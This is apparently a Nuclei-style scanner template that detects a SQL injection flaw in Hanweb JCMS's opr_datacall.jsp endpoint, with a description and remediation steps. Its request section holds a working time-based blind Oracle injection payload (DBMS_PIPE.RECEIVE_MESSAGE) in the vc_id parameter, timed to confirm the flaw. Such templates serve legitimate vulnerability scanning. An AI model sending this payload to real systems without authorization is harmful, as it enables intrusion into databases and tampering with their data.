id: JCMS-Opr_Datacall_Jsp-SQLi
info:
  name: Hanweb jcms/lm/front/api/opr_datacall.jsp SQL injection
  author:
  - l0ne1y
  description: |-
    Hanweb JCMS opr_datacall.jsp SQL injection vulnerability.
    Hanweb JCMS is a content management system designed on a J2EE architecture. The system provides all the functions needed throughout the information lifecycle, including content collection, creation, management, delivery, publishing, and shared distribution.

    Hanweb JCMS has an SQL injection vulnerability. An attacker can exploit it to execute SQL statements and view, add, modify, or delete information in the database.
  severity: high
  remediation: |-
    Official Fix:
    1. It is recommended that users obtain the latest patch or the latest version from the official site:
    https://www.hanweb.com/

    Temporary Fix:
    1. Use prepared statements. When using PDO, be careful not to concatenate variables directly into PDO statements. All queries should use the parameterized query interface provided by the database; parameterized statements use parameters instead of embedding user-input variables into SQL statements. Virtually all database systems provide a parameterized SQL execution interface, which can very effectively prevent SQL injection attacks.
    2. Escape special characters (such as '"<>&*;) entering the database, or perform encoding conversion.
    3. Validate the type of each piece of data; for example, numeric data must be numeric and the corresponding database field must be of type int.
    4. Strictly enforce data length limits, which to some degree prevents long SQL injection statements from executing correctly.
    5. Use consistent encoding across every data layer of the website; UTF-8 is recommended. Inconsistent encoding between layers may allow some filtering mechanisms to be bypassed.
    6. Strictly limit the database privileges of the website user, granting only the privileges needed to perform their work, thereby minimizing the damage injection attacks can cause to the database.
    7. Avoid displaying SQL error messages, such as type errors or field mismatches, to prevent attackers from using such error information for reconnaissance.
    8. Filter dangerous characters; for example, use regular expressions to match keywords such as union, sleep, and, select, and load_file, and stop execution if matched.
requests:
- matchers:
  - type: dsl
    condition: and
    dsl:
    - status_code_1==200 && status_code_2==200
    - (duration_2 - duration_1)  >= 5
  path:
  - '{{BaseURL}}/lm/front/api/opr_datacall.jsp?fn_billstatus=E&vc_id=1'
  - '{{BaseURL}}/lm/front/api/opr_datacall.jsp?fn_billstatus=E&vc_id=1%27%20AND%204683=DBMS_PIPE.RECEIVE_MESSAGE(CHR(120)||CHR(104)||CHR(119)||CHR(98),5)%20AND%20%27OxYZ%27=%27OxYZ'
  method: GET
